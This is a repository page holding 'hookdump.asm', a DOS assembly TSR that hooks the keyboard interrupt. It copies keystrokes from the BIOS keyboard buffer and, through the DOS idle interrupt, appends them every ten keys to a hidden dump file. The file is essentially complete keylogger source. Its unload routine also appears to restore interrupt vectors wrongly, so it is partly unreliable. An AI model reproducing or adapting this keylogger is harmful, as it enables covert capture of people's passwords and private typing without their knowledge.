Kezdőlap Felfedezés Súgó
Bejelentkezés
enikesha
/
old
1
0
Másolás 0
Fájlok Problémák 0 Beolvasztási kérések 0 Wiki
Branch: master
Branch-ok Tag-ek
old
/
ASM
/
!ALL
/
hookdump.asm

hookdump.asm 1.9 KB
Állandó hivatkozás Előzmények Nyers

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143 
  1. .286
    2. 

  2. .model small
    3. 

  3. .code
    4. 

  4. org 100h
    5. 

  5. start:
    6. 

  6. 	mov ax,	4ch*4
    7. 

  7. 	mov si, ax
    8. 

  8. 	mov ax, 0
    9. 

  9. 	mov es,	ax
    10. 

  10. 	mov ax,	es:[si]
    11. 

  11. 	cmp ax, 0FAC0h
    12. 

  12. 	je  UNLOAD
    13. 

  13. 	mov old0x4Co, ax
    14. 

  14. 	mov ax,	es:[si+2]
    15. 

  15. 	mov old0x4Cs, ax
    16. 

  16. 	mov word ptr es:[si], 0FAC0h
    17. 

  17. 	mov word ptr es:[si+2], cs
    18. 

  18. 	mov ax,	3509h
    19. 

  19. 	int 21h
    20. 

  20. 	mov old0x9s,	es
    21. 

  21. 	mov old0x9o,	bx
    22. 

  22. 

  23. 	mov ax,	3528h
    24. 

  24. 	int 21h
    25. 

  25. 	mov old0x28s,	es
    26. 

  26. 	mov old0x28o,	bx
    27. 

  27. 

  28. 	mov ax,	2509h
    29. 

  29. 	mov dx,	offset NEW0x9
    30. 

  30. 	int 21h
    31. 

  31. 

  32. 	mov ax,	2528h
    33. 

  33. 	mov dx,	offset NEW0x28
    34. 

  34. 	int 21h
    35. 

  35. 

  36. 	mov ah,	31h
    37. 

  37. 	mov dx,	50h
    38. 

  38. 	int 21h
    39. 

  39. 

  40. UNLOAD: mov ax, es:[si+2]
    41. 

  41. 	mov es,	ax
    42. 

  42. 	mov ax,	2509h
    43. 

  43. 	mov ds,	es:[offset old0x9o]
    44. 

  44. 	mov dx,	es:[offset old0x9s]
    45. 

  45. 	int 21h
    46. 

  46. 

  47. 	mov ax,	2528h
    48. 

  48. 	mov ds,	es:[offset old0x9o]
    49. 

  49. 	mov dx,	es:[offset old0x9s]
    50. 

  50. 	int 21h
    51. 

  51. 	mov ax, es:[offset old0x4Co]
    52. 

  52. 	mov bx, es:[offset old0x4Cs]
    53. 

  53. 	mov cx,	0
    54. 

  54. 	mov es, cx
    55. 

  55. 	mov es:[4ch*4], ax
    56. 

  56. 	mov es:[4ch*4+2], bx
    57. 

  57. 	int 20h
    58. 

  58. NEW0x9:
    59. 

  59. 	pusha
    60. 

  60. 	push es
    61. 

  61. 	mov ax,	40h
    62. 

  62. 	mov es,	ax
    63. 

  63. 	mov ax, es:[1ch]
    64. 

  64. 	mov bx, ax
    65. 

  65. 	pushf
    66. 

  66. 	call dword ptr [old0x9o]
    67. 

  67. 	mov ax, es:[1ch]
    68. 

  68. 	cmp ax,	bx
    69. 

  69. 	je NOTNEWBUTT
    70. 

  70. 	mov si,	ax
    71. 

  71. 	mov bx,	cnt
    72. 

  72. 	cmp si,	1ch
    73. 

  73. 	jne OBLS
    74. 

  74. 	mov dl,  es:[3ch]
    75. 

  75. 	jmp GGG
    76. 

  76. OBLS:	mov dl,  es:[si-2]
    77. 

  77. GGG:	mov cs:buf[bx], dl
    78. 

  78. 	inc cnt
    79. 

  79. NOTNEWBUTT:
    80. 

  80.         cli
    81. 

  81.         mov al,  20h
    82. 

  82.         out 20h, al
    83. 

  83.         pop es
    84. 

  84.         popa
    85. 

  85.         iret
    86. 

  86. 

  87. NEW0x28:
    88. 

  88. 	pusha
    89. 

  89. 	push es
    90. 

  90. 

  91. 	pushf
    92. 

  92. 	call dword ptr [old0x28o]
    93. 

  93. 

  94. 	cmp cnt, 10
    95. 

  95. 	jne SHIT
    96. 

  96. 

  97. 	mov cnt, 0
    98. 

  98. 	push ds
    99. 

  99. 	push cs
    100. 

  100. 	pop ds
    101. 

  101. 	mov ax,	3d02h
    102. 

  102. 	mov dx,	offset fname
    103. 

  103. 	int 21h
    104. 

  104. 	jc  create
    105. 

  105. 	jmp cool
    106. 

  106. create:
    107. 

  107. 	mov ah,	3ch
    108. 

  108. 	mov cx,	0
    109. 

  109. 	mov dx,	offset fname
    110. 

  110. 	int 21h
    111. 

  111. cool:
    112. 

  112. 	mov bx, ax
    113. 

  113. 	mov ah,	42h
    114. 

  114. 	mov al,	2
    115. 

  115. 	mov cx,	0
    116. 

  116. 	mov dx,	0
    117. 

  117. 	int 21h
    118. 

  118. 

  119. 	mov ah,	40h
    120. 

  120. 	mov cx,	10
    121. 

  121. 	mov dx,	offset buf
    122. 

  122. 	int 21h
    123. 

  123. 

  124. 	mov ah,	3eh
    125. 

  125. 	int 21h
    126. 

  126. 	pop ds
    127. 

  127. 

  128. SHIT:
    129. 

  129.         pop es
    130. 

  130.         popa
    131. 

  131.         iret
    132. 

  132. 

  133. old0x9o 	dw 0
    134. 

  134. old0x9s		dw 0
    135. 

  135. old0x28o 	dw 0
    136. 

  136. old0x28s 	dw 0
    137. 

  137. OLD0x4Co	dw 0
    138. 

  138. OLD0x4Cs	dw 0
    139. 

  139. 

  140. cnt	dw 0
    141. 

  141. buf 	db 10 dup (?)
    142. 

  142. fname db 'fuck.dmp',0
    143. 

  143. end start
    144.